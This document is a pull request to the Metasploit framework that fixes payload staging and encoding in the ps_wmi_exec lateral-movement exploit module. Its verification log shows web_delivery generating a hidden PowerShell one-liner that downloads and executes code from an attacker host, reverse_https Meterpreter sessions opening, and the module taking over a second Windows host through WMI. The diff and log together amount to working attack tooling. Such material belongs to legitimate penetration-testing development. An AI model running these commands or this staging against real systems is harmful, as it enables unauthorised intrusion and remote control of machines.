### PR TITLE
Fix issue in ps_wmi_exec and powershell staging

### DIFF
--- a/lib/msf/core/post/windows/powershell.rb
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -134,7 +134,7 @@ module Msf
 
             # Build the set commands
             set_env_variable =  "[Environment]::SetEnvironmentVariable(" \
-                                "'#{env_variable}'," \
+                                "'#{env_prefix}'," \
                                 "'#{chunk}', 'User')"
 
             # Compress and encode the set command

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -4,7 +4,6 @@
 ##
 
 
-require 'msf/core'
 require 'msf/core/post/windows/powershell'
 require 'msf/core/post/windows/priv'
 require 'msf/core/exploit/powershell/dot_net'

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
         OptString.new('PASSWORD', [false, "Password to authenticate with"]),
         OptString.new('DOMAIN', [false, "Domain or machine name"]),
 
-      ], self.class)
+      ])
 
     register_advanced_options(
       [
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
           false
         ]),
 
-      ], self.class)
+      ])
 
   end
 

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Local
       sleep_time = rand(5)+5
       psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
     end
-    psh_payload = compress_script(psh_payload_raw, eof)
+    psh_payload = encode_script(compress_script(psh_payload_raw, eof), eof)
     # WMI exec function - this is going into powershell.rb after pull 701 is commited
     script = ps_wmi_exec(run_opts)
     # Build WMI exec calls to every host into the script to reduce PS instances


### PR DESCRIPTION
The staging function in the post/windows/powershell class was broken
in a previous commit as the definition for env_variable was removed and
env_prefix alone is now used. This caused an error to be thrown when
attempting to stage the payload. This changes the reference from
env_variable to env_prefix.

Additionally, the ps_wmi_exec module created a powershell script to be
run that was intended to be used with the EncodedCommand command line
option; however the script itself was never actually encoded. This
change passes the compressed script to the encode_script function to
resolve that issue.

## Verification

- [x] Start `msfconsole`
- [x] Set up a session on the first Windows host (Such as via web_delivery)
- [x] Attempt to run ps_wmi_exec through the established session against a second Windows host and verify you receive an error
- [x] Switch to fixed branch and start `msfconsole`
- [x] Set up a session on the first host again
- [x] Attempt to run ps_wmi_exec through the established session against the second Windows host and verify no error is received and a session is established

```Set up a session on the first host just via web_delivery:
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.151.129:8443
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/CTPsxOrvc6Jk
[*] Local IP: http://127.0.0.1:8080/CTPsxOrvc6Jk
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://192.168.151.129:8080/CTPsxOrvc6Jk');
[*] 192.168.151.132  web_delivery - Delivering Payload

Execute the powershell to establish session:
[*] https://192.168.151.129:8443 handling request from 192.168.151.132; (UUID: nesvi3c3) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 1 opened (192.168.151.129:8443 -> 192.168.151.132:2661) at 2017-04-28 03:06:03 -0400


Attempt to run ps_wmi_exec through the established session and get error:
msf exploit(ps_wmi_exec) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ps_wmi_exec) > set LHOST 192.168.151.129
LHOST => 192.168.151.129
msf exploit(ps_wmi_exec) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(ps_wmi_exec) > set RHOSTS 192.168.151.134
RHOSTS => 192.168.151.134
msf exploit(ps_wmi_exec) > exploit

[-] Exploit failed: NameError undefined local variable or method `env_variable' for #<Msf::Modules::Mod6578706c6f69742f77696e646f77732f6c6f63616c2f70735f776d695f65786563::MetasploitModule:0x005601fd3c1c70>

Switch to fixed branch:
Get session on first host again:
resource (web_delivery)> exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.151.129:8443
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/TqwTlIH
[*] Local IP: http://127.0.0.1:8080/TqwTlIH
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://192.168.1.230:8080/TqwTlIH');

[*] https://192.168.1.230:8443 handling request from 192.168.151.132; (UUID: tbqevwu2) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.151.129:8443 -> 192.168.151.132:3152) at 2017-04-28 03:11:28 -0400


Attempt to exploit second box again:
msf exploit(web_delivery) > use exploit/windows/local/ps_wmi_exec
msf exploit(ps_wmi_exec) > set SESSION 1
SESSION => 1
msf exploit(ps_wmi_exec) > set RHOSTS 192.168.151.134
RHOSTS => 192.168.151.134
msf exploit(ps_wmi_exec) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(ps_wmi_exec) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ps_wmi_exec) > set LHOST 192.168.151.129
LHOST => 192.168.151.129
msf exploit(ps_wmi_exec) > exploit

[+]  - Bytes remaining: 12448
[+]  - Bytes remaining: 4448
[+] Payload successfully staged.
msf exploit(ps_wmi_exec) > 
[*] https://192.168.1.230:8443 handling request from 192.168.151.134; (UUID: tbqevwu2) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 2 opened (192.168.151.129:8443 -> 192.168.151.134:50127) at 2017-04-28 03:13:12 -0400
```